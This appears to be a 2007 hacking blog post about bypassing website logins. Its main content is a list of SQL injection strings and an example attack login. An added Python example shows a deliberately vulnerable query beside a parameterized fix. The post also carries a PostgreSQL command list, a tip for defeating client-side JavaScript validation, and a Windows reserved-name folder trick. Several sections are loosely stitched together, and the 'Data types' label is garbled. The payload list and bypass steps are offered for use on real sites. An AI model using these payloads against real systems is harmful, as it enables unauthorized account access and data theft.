Bypass login by SQL injection (explained)
For those of you who don't already know, SQL injection is a technique that takes advantage of
non-validated input vulnerabilities to pass SQL commands through a Web application for execution by
a backend database. Attackers take advantage of the fact that programmers often chain together SQL
commands with user-provided parameters, and can therefore embed SQL commands inside these
parameters. The result is that the attacker can execute arbitrary SQL queries and commands on the
backend database server through the Web application.
A database is a table full of private and public site information such as usernames, products, etc.
Databases are fundamental components of Web applications. They enable Web applications to store
data, preferences and content elements. Using SQL, Web applications interact with databases to
dynamically build customized data views for each user.
Data types:
mysql.user
mysql.host
mysql.db
Bypassing login scripts:
SQL injection strings; the DB doesn't matter.
‘) OR (‘a’ = ‘a
‘) OR (’1′-’1
‘or”=’
‘ OR ’1=1
admin’–
‘ or 0=0 –
” or 0=0 –
or 0=0 –
‘ or 0=0 *
” or 0=0 *
or 0=0 *
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”a
‘ or 1=1–
or a=a–
‘ or 1=1–
1′ having ’1′=’1′–
‘ or ‘x’='x–
foo’+OR+’1′=’1
Note: having 1=1–
12/27/07
Sourav Patra
Example:
Login: hi’or 1=1–
Password: hi’or 1=1–
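Why the example login above is accepted when the query is built by chaining user input into the SQL text, and how a parameterized query rejects it. This is an added example, not code from the original post; the in-memory SQLite database, the users table, the sample account and all function names are assumptions made for the illustration.

```python
import sqlite3

# Constructed inputs: three strings from the list above, typed with plain ASCII quotes.
SAMPLE_INPUTS = ["hi'or 1=1--", "' or 'x'='x", "admin'--"]

def make_db():
    # Constructed sample data. Plaintext password only to keep the example
    # short; real applications store a salted password hash.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT PRIMARY KEY, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return db

def build_concat_query(login, password):
    # Vulnerable on purpose: user input is chained into the SQL text.
    return ("SELECT COUNT(*) FROM users WHERE login = '" + login +
            "' AND password = '" + password + "'")

def login_vulnerable(db, login, password):
    try:
        return db.execute(build_concat_query(login, password)).fetchone()[0] > 0
    except sqlite3.Error:
        return False  # the input produced SQL that does not parse

def login_parameterized(db, login, password):
    # Fixed statement text; values are bound, so quotes and "--" stay data.
    row = db.execute(
        "SELECT COUNT(*) FROM users WHERE login = ? AND password = ?",
        (login, password)).fetchone()
    return row[0] > 0

def unauthorized_logins(login_fn):
    # Submit each sample string as both login and password, as in the
    # example above, and return the ones that are accepted.
    db = make_db()
    return [s for s in SAMPLE_INPUTS if login_fn(db, s, s)]

if __name__ == "__main__":
    print(build_concat_query("hi'or 1=1--", "hi'or 1=1--"))
    print("concatenated :", unauthorized_logins(login_vulnerable))
    print("parameterized:", unauthorized_logins(login_parameterized))
```

Printing the concatenated query shows the cause: the quote in the input closes the string literal, and everything after `--` is treated as a comment, so the password check never runs.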
SQL commands:
ABORT — abort the current transaction
ALTER DATABASE — change a database
ALTER GROUP — add users to a group or remove users from a group
ALTER TABLE — change the definition of a table
ALTER TRIGGER — change the definition of a trigger
ALTER USER — change a database user account
ANALYZE — collect statistics about a database
BEGIN — start a transaction block
CHECKPOINT — force a transaction log checkpoint
CLOSE — close a cursor
CLUSTER — cluster a table according to an index
COMMENT — define or change the comment of an object
COMMIT — commit the current transaction
COPY — copy data between files and tables
CREATE AGGREGATE — define a new aggregate function
CREATE CAST — define a user-defined cast
CREATE CONSTRAINT TRIGGER — define a new constraint trigger
CREATE CONVERSION — define a user-defined conversion
CREATE DATABASE — create a new database
CREATE DOMAIN — define a new domain
CREATE FUNCTION — define a new function
CREATE GROUP — define a new user group
CREATE INDEX — define a new index
CREATE LANGUAGE — define a new procedural language
CREATE OPERATOR — define a new operator
CREATE OPERATOR CLASS — define a new operator class for indexes
CREATE RULE — define a new rewrite rule
CREATE SCHEMA — define a new schema
CREATE SEQUENCE — define a new sequence generator
CREATE TABLE — define a new table
CREATE TABLE AS — create a new table from the results of a query
CREATE TRIGGER — define a new trigger
CREATE TYPE — define a new data type
CREATE USER — define a new database user account
CREATE VIEW — define a new view
DEALLOCATE — remove a prepared query
DECLARE — define a cursor
DELETE — delete rows of a table
DROP AGGREGATE — remove a user-defined aggregate function
DROP CAST — remove a user-defined cast
DROP CONVERSION — remove a user-defined conversion
DROP DATABASE — remove a database
DROP DOMAIN — remove a user-defined domain
DROP FUNCTION — remove a user-defined function
DROP GROUP — remove a user group
DROP INDEX — remove an index
DROP LANGUAGE — remove a user-defined procedural language
DROP OPERATOR — remove a user-defined operator
DROP OPERATOR CLASS — remove a user-defined operator class
DROP RULE — remove a rewrite rule
DROP SCHEMA — remove a schema
DROP SEQUENCE — remove a sequence
DROP TABLE — remove a table
DROP TRIGGER — remove a trigger
DROP TYPE — remove a user-defined data type
DROP USER — remove a database user account
DROP VIEW — remove a view
END — commit the current transaction
EXECUTE — execute a prepared query
EXPLAIN — show the execution plan of a statement
FETCH — retrieve rows from a table using a cursor
GRANT — define access privileges
INSERT — create new rows in a table
LISTEN — listen for a notification
LOAD — load or reload a shared library file
LOCK — explicitly lock a table
MOVE — position a cursor on a specified row of a table
NOTIFY — generate a notification
PREPARE — create a prepared query
REINDEX — rebuild corrupted indexes
RESET — restore the value of a run-time parameter to a default value
REVOKE — remove access privileges
ROLLBACK — abort the current transaction
SELECT — retrieve rows from a table or view
SELECT INTO — create a new table from the results of a query
SET — change a run-time parameter
SET CONSTRAINTS — set the constraint mode of the current transaction
SET SESSION AUTHORIZATION — set the session user identifier and the current user identifier of the
current session
SET TRANSACTION — set the characteristics of the current transaction
SHOW — show the value of a run-time parameter
START TRANSACTION — start a transaction block
TRUNCATE — empty a table
UNLISTEN — stop listening for a notification
UPDATE — update rows of a table
VACUUM — garbage-collect and optionally analyze a database
Input validation can also be bypassed because of bad programming techniques. On most websites,
input validation is done at the client end, i.e. in the browser, using JavaScript. What you can do
is open the page and save it to your hard disk. Then open the HTML page in any HTML editor (say
FrontPage or Dreamweaver or even Notepad), delete the JavaScript input validation code, and then
simply go ahead.
Open a command prompt.
Change to the directory in which you want to make the folder.
Type
mkdir .\con\\
Or
Md .\con\\
You can choose the folder name from the names given below:
CON
LPT1
LPT2
LPT3
LPT4
LPT5
LPT6
LPT7
LPT8
LPT9
AUX
———————–
The logic behind this is: in Windows the above names are reserved words and you can't create a
folder or file with the above names. Once you create the folder, nobody will be able to delete it in
the normal way. I have tested it with XP, 2000 and 2003. Windows 98 is currently not available to me
for testing. If you can test it on Windows 98 then please do it and let me know the result. I expect
it to work.